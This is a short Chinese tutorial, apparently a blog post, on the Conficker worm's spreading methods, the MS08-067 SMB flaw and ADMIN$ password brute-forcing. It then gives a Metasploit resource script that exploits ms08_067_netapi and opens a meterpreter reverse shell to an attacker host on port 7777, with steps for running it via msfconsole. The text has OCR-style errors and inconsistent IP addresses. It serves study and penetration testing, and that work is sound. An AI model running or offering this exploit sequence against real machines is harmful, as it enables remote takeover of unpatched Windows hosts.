目錄
一、簡介
1.1、分析:
二、Metasploit攻擊Windows SMB服務
2.1、分析:
2.2、示例:
1.1、分析:
在其基本的感染方法中, Conficker蠕蟲使用了兩種不同的攻擊方法。
1、利用了Windows服務器中一個服務的Oday漏洞。利用這個棧溢出漏洞, 蠕蟲能在被感染的主機上執行shellcode並下載蠕蟲。
2、Conficker蠕蟲暴力破解默認的管理員網絡共享(ADMN$)的口令以獲取肉機訪問權。
2.1、分析:
利用Metasploit框架(http://metasploit.com/download/)簡化攻擊代碼。作為一個開源計算機安全項目,很快就被廣泛使用, 並且已經變成了一個漏洞利用代碼的開發工具包。
Metasploit能讓滲透測試人員在標准化和腳本化的環境中運行數以千計的不同的計算機漏洞利用代碼。在Con.ticker蠕蟲中使用的漏洞曝光後不久, HDMoore就將一個有效的漏洞利用代碼整合進了框架內—-MS08-067 _netapi
2.2、示例:
雖然攻擊者可以通過交互驅動的方式使用Metasploit, 但Metasploit也能讀取批處理腳本(re)完成攻擊。在攻擊時,Metasploit會順序執行批處理文件中的命令。
如使用ms08 _ 067 netapi (Conficker)攻擊“ 肉機” (192.168.x.x), 使之與我們自己的主機192.168.xx.xx的7777端口建立一個反向shell
use exploit/windows/smb/ms08_ 067_netapi set RHOST 192.168.x.x set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.xx.xx set LPORT 7777 exploit -j -z
使用Metasploit進行攻擊時, 先選好要用的漏洞利用代碼(exploit/windows/smb/ms08 _ 067 _ netapi)
選定目標,目標設置為192.168.1.37
設定負載為windows/meterpreter/reverse _ tcp
將反向連接的目標設為主機192.168.77.77, 端口為7777
最後Metasploit去實施攻擊。
將上面這些代碼保存為文件conficker.rc。只要輸入命令msfconsole -r conficker.rc, 就能發起攻擊。這條命令讓Metasploit運行腳本conficker.rc中的指令。如果攻擊成功, 會返回一個讓我們能控制目標計算機的Windows 命令行shell。